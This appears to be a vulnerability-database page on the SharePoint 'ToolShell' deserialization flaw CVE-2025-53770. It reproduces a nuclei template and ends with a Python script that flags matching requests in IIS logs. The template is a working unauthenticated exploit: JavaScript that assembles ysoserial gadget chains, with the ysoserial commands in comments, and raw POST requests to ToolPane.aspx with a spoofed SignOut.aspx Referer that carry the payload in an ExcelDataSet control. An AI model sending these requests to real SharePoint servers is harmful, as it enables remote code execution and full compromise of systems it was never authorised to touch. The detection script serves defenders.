Microsoft SharePoint Server Remote Code Execution Vulnerability

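Vulnerability Information

Vulnerability name: Microsoft SharePoint Server Remote Code Execution Vulnerability

Vulnerability ID:

  • CVE: CVE-2025-53770

Vulnerability type: Deserialization

Severity: Critical

Description: Microsoft SharePoint Server is a widely used enterprise collaboration platform that supports document management, team collaboration, and business process automation. The vulnerability exists in on-premises versions of SharePoint Server and involves the deserialization of untrusted data. An attacker can exploit it over the network to execute code remotely without authentication, resulting in full control of the system. The technical root cause is that SharePoint Server fails to properly validate input when processing certain data, which allows an attacker to craft malicious data that triggers deserialization and executes arbitrary code. The vulnerability has been observed being exploited in the wild, and Microsoft has confirmed that exploit code for it exists. Attackers can use it for remote code execution, which may lead to data leakage, service disruption, and other serious consequences. Because the attack requires no authentication and can be automated, the security risk of this vulnerability is extremely high.

Vendor: Microsoft

Product: SharePoint Server

Search query: http.component:"sharepoint"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/1b58b8e5683444c0b2b70fb29084c2a5bbfefdca/http%2Fcves%2F2025%2FCVE-2025-53770.yaml

Type: projectdiscovery/nuclei-templates:github issues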

PoC Details


id: CVE-2025-53770

info:
  name: Microsoft SharePoint Server - Remote Code Execution (ToolShell)
  author: _l0gg,SamIntruder,sfewer-r7,iamnoooob,pdresearch
  severity: critical
  description: |
    Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network. Microsoft is aware that an exploit for CVE-2025-53770 exists in the wild. Microsoft is preparing and fully testing a comprehensive update to address this vulnerability. In the meantime, please make sure that the mitigation provided in this CVE documentation is in place so that you are protected from exploitation.
  impact: |
    Unauthenticated attackers can exploit unsafe deserialization to achieve remote code execution on SharePoint Server, leading to full system compromise.
  remediation: |
    Apply the latest security patches from Microsoft or implement the temporary mitigations provided in the CVE documentation until a comprehensive update is available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53770
    - https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/
    - https://x.com/codewhitesec/status/1944743478350557232
    - https://github.com/rapid7/metasploit-framework/pull/20409
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-53770
    cwe-id: CWE-502
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"sharepoint"
  tags: cve,cve2025,kev,sharepoint,rce,microsoft,toolshell

variables:
  dataset_gadget_b64: '<base64 gadget blob omitted>'
  # ./ysoserial.exe -f LosFormatter -g XamlAssemblyLoadFromFile -c "Exploit.cs;System.dll;System.Web.dll"
  # HttpContext.Current.Response.Headers["X-Nuclei"] = "CVE-2025-53770";
  internal_gadget_b64: '<base64 gadget blob omitted>'
  # ./ysoserial.exe -f LosFormatter -g ActivitySurrogateSelectorFromFile -c "E.cs;System.dll;System.Web.dll;System.Configuration.dll" --minify
  # HttpContext.Current.Response.Headers["X-Nuclei"] = "CVE-2025-53770";
  internal_gadget2_b64: '<base64 gadget blob omitted>'


flow: javascript() && http(1)
javascript:
  - code: |
      const bytess = require("nuclei/bytes");

      function u8(arr) { return new Uint8Array(arr); }

      // String → Buffer (binary-safe)
      function strToBuf(str) {
        var b = new bytes.Buffer();
        b.WriteString(str);
        return b;
      }
      // 7-bit int encoding (like .NET BinaryWriter)
      function encode7BitInt(n) {
        if (n === 0) return new bytes.Buffer(u8([0]));
        var tmp = [];
        while (n > 0) {
          var v = n & 0x7F;
          n >>>= 7;
          if (n > 0) v |= 0x80;
          tmp.push(v);
        }
        return new bytes.Buffer(u8(tmp));
      }
      // Replace all occurrences of needle(Buffer) with repl(Buffer) in hay(Buffer)
      function replaceAllBytes(hay, needle, repl) {
        var H = hay.Bytes();
        var N = needle.Bytes();
        var out = new bytes.Buffer();

        for (var i = 0; i < H.length;) {
          var match = true;
          for (var j = 0; j < N.length; j++) {
            if (i + j >= H.length || H[i + j] !== N[j]) { match = false; break; }
          }
          if (match) {
            out.Write(repl.Bytes());
            i += N.length;
          } else {
            out.Write(u8([H[i]])); // <-- IMPORTANT: Uint8Array, not plain []
            i++;
          }
        }
        return out;
      }
      dataset_gadget_raw = strToBuf(atob(dg));
      dataset_gadget_raw1 = replaceAllBytes(
        dataset_gadget_raw,
        strToBuf("HAX"),
        strToBuf(ig)
      );
      dataset_gadget_raw2 = replaceAllBytes(
        dataset_gadget_raw,
        strToBuf("HAX"),
        strToBuf(ig2)
      );
      var oldLen = encode7BitInt(9163);
      var newLen = encode7BitInt(9163 - 7772 + ig.length);
      var newLen2 = encode7BitInt(9163 - 7772 + ig2.length);
      dataset_gadget_raw1 = replaceAllBytes(dataset_gadget_raw1, oldLen, newLen);
      dataset_gadget_raw2 = replaceAllBytes(dataset_gadget_raw2, oldLen, newLen2);
      (btoa(dataset_gadget_raw1.String()) + ":" + btoa(dataset_gadget_raw2.String()))

    args:
      ig: "{{internal_gadget_b64}}"
      ig2: "{{internal_gadget2_b64}}"
      dg: "{{dataset_gadget_b64}}"
http:
  - raw:
      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: /_layouts/SignOut.aspx
        Accept-Encoding: gzip

        MSOTlPn_Uri={{Scheme}}%3a//{{Hostname}}/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3c%25%40%20Register%20Tagprefix%3d%22gizpnozlcjfutvbn%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%3c%25%40%20Register%20Tagprefix%3d%22sjqjboucouuj%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%3cgizpnozlcjfutvbn%3aUpdateProgress%3e%0a%20%20%20%20%3cProgressTemplate%3e%0a%20%20%20%20%20%20%3csjqjboucouuj%3aExcelDataSet%20CompressedDataTable%3d%22{{urlencode(base64(gzip(base64_decode(replace_regex(javascript_response,":.*","")))))}}%22%20DataTable-CaseSensitive%3d%22true%22%20runat%3d%22server%22/%3e%0a%20%20%20%20%3c/ProgressTemplate%3e%0a%20%20%3c/gizpnozlcjfutvbn%3aUpdateProgress%3e%0a

      - |
        POST /_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: /_layouts/SignOut.aspx
        Accept-Encoding: gzip

        MSOTlPn_Uri={{Scheme}}%3a//{{Hostname}}/_controltemplates/15/AclEditor.ascx&MSOTlPn_DWP=%3c%25%40%20Register%20Tagprefix%3d%22gizpnozlcjfutvbn%22%20Namespace%3d%22System.Web.UI%22%20Assembly%3d%22System.Web.Extensions%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d31bf3856ad364e35%22%20%25%3e%0a%3c%25%40%20Register%20Tagprefix%3d%22sjqjboucouuj%22%20Namespace%3d%22Microsoft.PerformancePoint.Scorecards%22%20Assembly%3d%22Microsoft.PerformancePoint.Scorecards.Client%2c%20Version%3d16.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3d71e9bce111e9429c%22%20%25%3e%0a%20%20%3cgizpnozlcjfutvbn%3aUpdateProgress%3e%0a%20%20%20%20%3cProgressTemplate%3e%0a%20%20%20%20%20%20%3csjqjboucouuj%3aExcelDataSet%20CompressedDataTable%3d%22{{urlencode(base64(gzip(base64_decode(replace_regex(javascript_response,".*:","")))))}}%22%20DataTable-CaseSensitive%3d%22true%22%20runat%3d%22server%22/%3e%0a%20%20%20%20%3c/ProgressTemplate%3e%0a%20%20%3c/gizpnozlcjfutvbn%3aUpdateProgress%3e%0a

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - 'contains(x_nuclei,"CVE-2025-53770")'
          - 'contains(body, "MSOTlPn_DWP")'
        condition: and
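
A defender-side check for the request shape used by the template above (a POST to /_layouts/15/ToolPane.aspx carrying a Referer of /_layouts/SignOut.aspx), run over IIS W3C logs. This is an added example, not part of the nuclei template or the original page; the log lines, field order and function names are constructed for illustration.

```python
"""Flag IIS W3C log entries that match the ToolPane.aspx request shape in the template."""
from urllib.parse import parse_qs, urlsplit

TOOLPANE_STEM = "/_layouts/15/toolpane.aspx"  # request path taken from the template
SIGNOUT_PATH = "/_layouts/signout.aspx"       # Referer value taken from the template

# Constructed sample log (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time cs-method cs-uri-stem cs-uri-query cs-username c-ip cs(User-Agent) cs(Referer) sc-status
2025-07-24 08:01:12 GET /_layouts/15/start.aspx - CONTOSO\\alice 192.0.2.10 Mozilla/5.0 - 200
2025-07-24 08:02:40 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx - 198.51.100.7 python-requests/2.32 /_layouts/SignOut.aspx 200
2025-07-24 08:03:05 POST /_layouts/15/toolpane.aspx DisplayMode=Edit CONTOSO\\bob 192.0.2.11 Mozilla/5.0 https://sp.example.test/sites/hr/SitePages/Home.aspx 200
2025-07-24 08:04:19 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx - 203.0.113.9 curl/8.5 https://sp.example.test/_layouts/SignOut.aspx 401
"""


def parse_w3c(text):
    """Yield one dict per log entry, keyed by the names in the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split(" ")
            if len(values) == len(fields):  # skip truncated or malformed rows
                yield dict(zip(fields, values))


def referer_path(value):
    """Return the lower-cased path of a Referer that may be absolute, relative or '-'."""
    return "" if value == "-" else urlsplit(value).path.lower()


def find_toolpane_probes(text):
    """Return entries that POST to ToolPane.aspx with a SignOut.aspx Referer."""
    findings = []
    for entry in parse_w3c(text):
        if entry.get("cs-method", "").upper() != "POST":
            continue
        if entry.get("cs-uri-stem", "").lower() != TOOLPANE_STEM:
            continue
        if referer_path(entry.get("cs(Referer)", "-")) != SIGNOUT_PATH:
            continue
        # Query keys are compared case-insensitively, as ASP.NET treats them.
        query = {
            key.lower(): values
            for key, values in parse_qs(
                entry.get("cs-uri-query", ""), keep_blank_values=True
            ).items()
        }
        findings.append({
            "when": f'{entry.get("date", "")} {entry.get("time", "")}'.strip(),
            "client": entry.get("c-ip", "-"),
            "status": entry.get("sc-status", "-"),
            # IIS logs '-' in cs-username when the request carried no identity.
            "anonymous": entry.get("cs-username", "-") == "-",
            "edit_mode": [v.lower() for v in query.get("displaymode", [])] == ["edit"],
        })
    return findings


if __name__ == "__main__":
    for hit in find_toolpane_probes(SAMPLE_LOG):
        print(hit)
```

The Referer is compared by path only, so both the relative form sent by the template and an absolute URL are caught; the authenticated web-part edit in the third sample row is not flagged.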



Author: lianccc
Published: July 24, 2025